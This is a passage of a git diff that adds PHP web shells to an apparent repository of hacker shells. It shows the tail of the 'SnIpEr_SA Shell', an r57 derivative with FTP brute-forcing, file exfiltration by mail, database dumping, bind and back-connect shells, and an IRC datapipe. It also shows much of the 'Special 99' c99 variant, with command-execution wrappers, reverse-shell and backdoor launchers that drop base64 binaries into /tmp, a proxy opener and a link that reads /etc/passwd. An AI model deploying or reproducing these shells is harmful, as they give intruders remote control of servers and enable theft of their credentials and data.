+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell  | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | ����� ������ ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> ����! ����� ��� ����� �� ��� ���� �������� ������.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SpecialShell_99.php.php.txt b/xakep-shells/PHP/SpecialShell_99.php.php.txt
new file mode 100644
index 0000000..3a3f703
--- /dev/null
+++ b/xakep-shells/PHP/SpecialShell_99.php.php.txt
@@ -0,0 +1,2822 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Tamamlandi!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>HATA!</b></font></br></br></br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="<b>".$_POST['backconnectip']."</b>Numarali ip uzerinden <b>".$_POST['backconnectport']." portundan baglanti kurulamadi! yeniden deneyiniz!</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Hata:</font> Baglanti saglanamiyor!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Hata:</font> Arkakapi sunucusuna baglanti saglanamiyor!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "Capian Pirates.OrG Special 99 Shell v1.0"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; 
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; 
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); 
+$login_txt = "Apache Error: Restricted File";
+$g3n_onaysiz_giris = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; 
+$donated_html = "";
+$donated_act = array(""); 
+$curdir = "./"; 
+
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+$log_email = "msn@g3n3t1x.org";
+$dsunucu = "http://q.qenetix.by.ru/3.txt";
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), 
+  array("config.php",1) 
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 100;
+
+
+$sess_cookie = "c99shvars"; 
+
+
+$quicklaunch = array(
+ array("<hr><center><font face='tahoma' size='1'><b>[AnaS&#601;hif&#601;]</b>",$surl),
+ array("<b><font face='tahoma' size='1'>[Axtar&#305;&#351;]</b>",$surl."act=search&d=%d"),
+
+ array("<b><font face='tahoma' size='1'>[Encode]</b>",$surl."act=encoder&d=%d"),
+ array("<b><font face='tahoma' size='1'>[&#304;&#351;l&#601;m&ccedil;i]</b>",$surl."act=processes&d=%d"),
+ array("<b><font face='tahoma' size='1'>[FTP Qirici]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b><font face='tahoma' size='1'>[Sistem M&#601;lumatlar&#305;]</b>",$surl."act=security&d=%d"),
+ array("<b><font face='tahoma' size='1'>[SQL Baglantisi]</b>",$surl."act=sql&d=%d"),
+ array("<b><font face='tahoma' size='1'>[php Kod i&#351;l&#601;t]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b><font face='tahoma' size='1'>[Arxa Qap&#305;]</b>",$surl."act=backc"),
+ array("<b><font face='tahoma' size='1'>[Shell'i Sil]</b>",$surl."act=selfremove"),
+
+ array("<b><font face='tahoma' size='1'>[ProxyQur]</b>",$surl."act=proxy"),
+ array("<b><font face='tahoma' size='1'>[Qapi Yarat]</b>",$surl."act=shbd"),
+);
+
+
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+
+
+
+// \/Burdan sonras&#1101;n&#1101; editlemeyiniz!\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Giris Yapilamiy0r!");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($g3n_onaysiz_giris);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
